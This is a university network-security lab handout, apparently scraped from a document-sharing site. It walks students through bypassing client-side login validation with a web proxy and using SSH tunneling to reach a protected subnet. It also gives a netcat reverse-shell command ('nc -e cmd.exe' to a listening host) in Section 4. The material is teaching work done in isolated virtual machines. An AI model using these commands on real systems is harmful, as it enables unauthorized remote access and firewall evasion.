Internetwork Security Lab: Web and Internet-Based Attacks, Lab Reports of Electrical and Electronics Engineering

A lab exercise focused on web and internet-based attacks, including using @stake webproxy for monitoring web traffic, performing a denial of service (dos) attack on ssl, and gaining remote shell access using netcat. Students will learn about ssl interactions with tcp, ssh tunneling, and protecting against ssh tunneling.

Typology: Lab Reports

Pre 2010

Uploaded on 08/05/2009

koofers-user-yoe
koofers-user-yoe 🇺🇸

10 documents

1 / 9

Toggle sidebar

This page cannot be seen from the preview

Don't miss anything!

bg1
ECE4112 Internetwork Security
Lab X: Web and Internet-Based Attacks
Group Number: _________
Member Names: ___________________ _______________________
Date Assigned:
Date Due:
Last Edited:
Lab Authored By: Cambiz Mura and David Eakes
Goal: The goal of this lab is to expose you to several Web and Internet-based attacks at both
the theory and practical level.
Summary: In this lab you will be learning how to use @stake WebProxy to monitor
Web traffic, how to perform a DoS on over SSL, how to use SSH tunneling to access
normally denied services on another subnet, and gaining remote shell access using netcat.
Some of this lab is more theory-based, so there will be questions about that.
Requirements:
Red Hat Enterprise 4 WS
VMWare with 3 - Red Hat 7.2 images and 1 – Windows XP image
@stake WebProxy
NetCat for both Linux and Windows XP
Apache server on Red Hat 4.0 host machine
Section 1: @stake WebProxy
I. Setup
Copy the @stake WebProxy installer from the NAS server to your desktop and run the
Installation program.
Open Internet Explorer:
1. Click on Start->Control Panel->Internet Options (make sure you have Control
Panel set to “Classic View”.
2. Click on the “Connections” tab.
3. Click to “LAN Settings”
4. Where you see “Proxy Server” check the box that says: “Use a proxy server for
your LAN” (Use should now be able to click on the “Advanced” button).
5. Under the column “Proxy address to use”, enter 127.0.0.1 for both the “HTTP”
and “Secure” rows.
6. For “HTTP” enter 5111 under the “Port” column.
7. For “Secure” enter 5112 under the “Port” column.
8. Click “OK” to confirm the changes.
(See Apendix B for instructions on configuring WebProxy for FireFox).
1
pf3
pf4
pf5
pf8
pf9

Partial preview of the text

Download Internetwork Security Lab: Web and Internet-Based Attacks and more Lab Reports Electrical and Electronics Engineering in PDF only on Docsity!

ECE4112 Internetwork Security

Lab X: Web and Internet-Based Attacks

Group Number: _________ Member Names: ___________________ _______________________ Date Assigned: Date Due: Last Edited: Lab Authored By: Cambiz Mura and David Eakes

Goal: The goal of this lab is to expose you to several Web and Internet-based attacks at both

the theory and practical level.

Summary: In this lab you will be learning how to use @stake WebProxy to monitor

Web traffic, how to perform a DoS on over SSL, how to use SSH tunneling to access normally denied services on another subnet, and gaining remote shell access using netcat. Some of this lab is more theory-based, so there will be questions about that.

Requirements:

 Red Hat Enterprise 4 WS  VMWare with 3 - Red Hat 7.2 images and 1 – Windows XP image  @stake WebProxy  NetCat for both Linux and Windows XP  Apache server on Red Hat 4.0 host machine

Section 1: @stake WebProxy

I. Setup

Copy the @stake WebProxy installer from the NAS server to your desktop and run the Installation program. Open Internet Explorer:

  1. Click on Start->Control Panel->Internet Options (make sure you have Control Panel set to “Classic View”.
  2. Click on the “Connections” tab.
  3. Click to “LAN Settings”
  4. Where you see “Proxy Server” check the box that says: “Use a proxy server for your LAN” (Use should now be able to click on the “Advanced” button).
  5. Under the column “Proxy address to use”, enter 127.0.0.1 for both the “HTTP” and “Secure” rows.
  6. For “HTTP” enter 5111 under the “Port” column.
  7. For “Secure” enter 5112 under the “Port” column.
  8. Click “OK” to confirm the changes. (See Apendix B for instructions on configuring WebProxy for FireFox).

Unzip the contents of js_validation.zip file to the html directory where Apache is running on your RedHat 4.0 host machine (NOTE: Apache should have been installed in a prior lab).

II. Background

Client side validation using javascript is very common in web applications and web sites. However, it is not a solution to all the potential threats that may exist. Security professionals must take many precautions to ensure that would be attackers do not find easy ways around a poorly implemented security scheme.

III. Procedure

Open up Internet Explorer and enter 57.35.6.x/login.html in the URL field, where 57.35.6.x is the IP of the RedHat 7.2 machine that is running Apache (57.35.6.x). Question 1.1 Enter any username and password combination and see, what happens? Why? Start @stake WebProxy by going to Start->Programs->webproxy and click on @stake WebProxy. Again, try to login to the site (57.35.6.x/login.html ), but now enter username: Henry and password: password. Of course you could login if you are a valid user! But what if you are not? Now open IE and enter http://webproxy in the URL field. @stake WebProxy comes with an easy-to-use interface that allows for much functionality. Click on the “RequestCache” tab. Now click on the “Show Cache” button. Screenshot #1 - Take a screen capture of the WebProxy RequestCache page. You should see the URL for the RedHat 4.0 machine, directed to the login.html page. Now click on the RequestEditor tab. Click on the page that includes the parameters for the submission of username and password. Enter whatever you wish in for these fields (it doesn’t matter) and see what happens. Cool huh? Question 1.2 Why were you able to login? Can this tool be used in conjuction with common SQL injection attacks? How? Question 1.3 What are some ways that web developers can incorporate more secure practices to prevent such attacks?

Before starting the machines, go to the console of 7.2A and edit its settings. Add another Ethernet port. This port will get the name eth1.

II. Procedure

Start all 3 RedHat7.2 virtual machines. You will now create 2 subnets. After they’re booted and logged in, go into 7.2A. Set 7.2A: eth0’s IP to 57.35.6.x+1 where x is your assigned IP number. Set 7.2A: eth1’s IP to 10.0.1.x+ Go to 7.2B. Set 7.2B: eth0’s IP to 57.35.6.x+ Set 7.2B default gateway to 57.35.6.x+ Go to 7.2C. Set 7.2C: eth0’s IP to 10.0.1.x+ Set 7.2C default gateway to 10.0.1.x+ 7.2A is now a router, 7.2B is in Subnet 1, and 7.2C is in Subnet 2. In 7.2A stop all services but sshd. In 7.2B make sure httpd is started, and create a simple webpage and put it in www. Name it webpage.html You will attempt to tunnel a connection from 7.2C to 7.2B. First try to access your webpage by opening a browser and attempt to connect to http://57.35.6.x+2/. If you set it up right, this should fail. Now, let’s try to access the webpage via SSH from 7.2C to 7.2B. In 7.2B: # ssh -l root -L 80:10.0.1.x+1:22 57.35.6.x+1 cat - In 7.2C: **# ssh -l root -L 7777:57.35.6.x+2:22 10.0.1.x+1 cat -

ssh -p 7777 localhost uname –a**

III. Response

Screenshot #3: Take a screenshot of your outcome. This implies that someone on the other end has allowed you into the protected subnet. Possibly consider trying to input the command in 7.2B from a connection from 7.2C once you’ve derived its password (which would be user:root password:password). Imagine how if someone’s password is compromised, this could be used to access a machine behind a protected firewall.

Question 3.1: How would you protect against SSH tunneling to compromise firewalls? Question 3.2: What other applications to SSH tunneling are there?

Section 4: Gain Remote Shell Access

This section was inspired by Hacking by Numbers – Bootcamp Practice 08 from 2005. http://www.blackhat.com/html/bh-usa-06/train-bh-us-06-sp-b.html

I. Setup

You will need a Red Hat 7.2 virtual machine and a Windows XP virtual machine. Make sure nc.exe and class_uniload.exe are on your Desktop in Windows XP. Also, you will be using @stake WebProxy again. Your IP addresses are as follows: Red Hat 7.2: 57.35.6. x + Windows XP: 57.35.6. x + x represents your group’s IP root.

II. Test NetCat

Open a terminal in Red Hat 7.2 and type this command: # nc -lvn -p 7777 This sets netcat into listening (-l) mode. (-p specifies the port. I happen to like 7777, so that’s what I’ll use. -v means verbose mode. -n means don’t attempt a DNS lookup) Now, on your WinXP machine, open a command line, cd to the Desktop where you have nc.exe and type this command: # nc -vn 57.35.6. x +1 7777 This connects to the netcat session on your Red Hat machine. If nothing fails, you get an output that says you’ve made a connection and both processes appear to wait, everything has gone normally and you’re ready to proceed. Kill both running netcats with Ctrl-C.

III. Gaining Access to the Remote Shell

Back in your terminal in Red Hat 4, type this command: # nc -lvn -p 7777 Red Hat is now listening. You will now attack Windows using netcat on Windows with this command: # nc -vn -e cmd.exe 57.35.6. x +1 7777 Take a look at your Red Hat 7.2 machine. If you did it properly, you should have a Windows XP command prompt in Linux! You now have all the privileges of the user you were logged in as on Windows. Screenshot #4: Take a screenshot of your terminal in Red Hat 7.2.

Appendix A: Red Hat 7.2 Setup

The following material copied and modified from Lab 1. Note: In this section you may need to hit control and alt keys at the same time to release your mouse from Vmware. Now you will be installing virtual machines on your host machine. One of the ways of doing this is to create a new virtual machine in VMware and then installing the OS on it, just as you would on a normal machine. If you already have one of these machines, you can make another machine from it by just copying the right directories. This cuts the installation time by a huge amount. You can copy both images at the same time in two different terminal windows. Copies of the virtual machines, created by the TAs, are available on the NAS server. You will be creating virtual machines out of them. Follow the steps below to do this.  Make sure you have a vmware folder in root. If not, create a vmware directory by using the command # mkdir /root/vmware  For this lab, you need 3 Red Hat 7.2 images. For this use the command # mkdir /root/vmware/RedHat7.2- x where x is a number  Copy the “ /mnt/nas4112/VMWare/RedHat7.2 ” directory to your “ /root/vmware / RedHat7.2- x” directory by using the command # cp -r /mnt/nas4112/VMWare/RedHat7.2 /root/Desktop/RedHat7.2- x  Type ‘ vmware & ’ in a terminal window to start VMWare. The '&' sign allows a process to run in the background, leaving the terminal open for use.  Follow the steps below to create a RedHat 7.2 virtual machine  Select File->New->New Virtual machine to create a new virtual machine  Choose Custom machine and click Next  Select legacy since these images were created with an older version of VMware and click Next  Select Linux for operating system and click Next  Change the name of the machine to RedHat7.2- x and set the directory to /root/vmware/RedHat7.2- x /RedHat7.  You will be warned now that you already have a machine at that location, answer yes (this is what we just copied to there)  Leave the virtual memory setting as it is. If it gives you problems, you can increase or decrease the amount of memory for each machine, later. Then click Next.  Select Bridged networking and click next.  On the I/O adapter screen just click next  Choose “Use an existing virtual disk” and click Next.  Click Browse, go into the /root/vmware/RedHat7.2- x /RedHat7.2 directory and choose the file called “RedHat7.2.vmdk” Click Finish. This will create a RedHat 7.2 virtual machine.

Appendix B: @stack WebProxy Configuration

For Internet Explorer:

  1. Click on Start->Control Panel->Internet Options (make sure you have Control Panel set to “Classic View”.
  2. Click on the “Connections” tab.
  3. Click to “LAN Settings”
  4. Where you see “Proxy Server” check the box that says: “Use a proxy server for your LAN” (Use should now be able to click on the “Advanced” button).
  5. Under the column “Proxy address to use”, enter 127.0.0.1 for both the “HTTP” and “Secure” rows.
  6. For “HTTP” enter 5111 under the “Port” column.
  7. For “Secure” enter 5112 under the “Port” column.
  8. Click “OK” to confirm the changes. For FireFox:
  9. In the browser menu, select “Tools->Options…”
  10. Click on the “Advanced” tab.
  11. Click on the “Network” tab.
  12. Where you see “Connection” click “Settings”.
  13. Check the “Manual proxy configuration” radio button.
  14. For “HTTP Proxy” enter 127.0.0.1 and port number 5111.
  15. For “SSL Proxy” enter 127.0.0.1 and port number 5112.
  16. Click “OK” to confirm the changes.